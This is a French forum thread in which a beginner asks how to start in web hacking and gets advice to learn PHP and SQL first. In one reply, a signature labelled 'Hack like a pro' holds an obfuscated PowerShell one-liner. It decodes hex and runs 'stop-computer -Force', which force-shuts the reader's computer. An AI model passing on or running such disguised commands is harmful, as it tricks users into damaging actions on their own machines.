Annonce

Réduire
Aucune annonce.

Question pour me lancer

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Question pour me lancer

    Salut à tous !

    Voilà je suis en retho en technique de transition informatique. J'ai donc de bonne base en C++, java et python. Cependant le domaine qui m'attire le plus serait du côté web. J'aimerais avoir votre avis sur comment débuter dans le hack web. Par exemple changer un lien dans une page (par la je veux dire modifier directement le code source ou utiliser un genre de miroir) ou encore pouvoir récupérer des informations sur le serveur et pourvoir les exploiter. Je précise que j'ai des connaissance basique ne HTML et css.. Bien que pas forcément utile pour ce genre de pratique je présume :/

    Merci d'avance pour vos conseils,
    Gaminou.

  • #2
    Tu trouveras énormément de tuto sur le net, mais je trouve personnellement plus facile à comprendre via des bons livres sur le sujet (mots clef kali linux web sur les vendeurs en ligne). En revanche je pense que dans ce domaine une bonne base en SQL et php sont plus que nécessaires, il serait donc sûrement interrésent de commencer par te faire les dents sur ces deux languages.

    Commentaire


    • #3
      Merci pour ta réponse je vais me mettre au php en premier je pense ^^ En combien de temps je peux acquérir les bases nécessaire ? Est-ce aussi simple que le C ?

      Commentaire


      • #4
        Si t'as un bon niveau en C++, le php c'est torché en 1 semaine
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          D'accord donc a raison de 2-3h par jours en 1-2 semaines je peux avoir un niveau suffisant en php ? Et qu'en est-il du sql ? (désolé des questions un peu basique, le web m'est très obscure ^^)

          Commentaire


          • #6
            Le SQL sert uniquement pour les bases de données qui sont omniprésente dans le WEB (entre autre), ce n'est pas extrèmement difficile à apprendre à proprement parler, c'est surtout de la compréhesion, mais ça peut être difficile et pénible à apprendre car il faut créer de nombreuses tables, et il y'a pas tellement de guide d'apprentissage sur ce langage.
            C'est vraiment surtout de la compréhension de chacune des requêtes que tu dois exprimer, et le fait que ce soit un language déclaratif peut un peu dérouter au début.

            Commentaire


            • #7
              Donc la pratique est encore la meilleure méthode pour l'apprendre ?

              Commentaire


              • #8
                La théorie et la pratique sont complémentaires, mais comment peux-tu toi même savoir que tu sais prog en HTML, CSS si tu n'as jamais fais ton propre site web ? Pareil avec SQL et php selon moi.

                Commentaire

                Chargement...
                X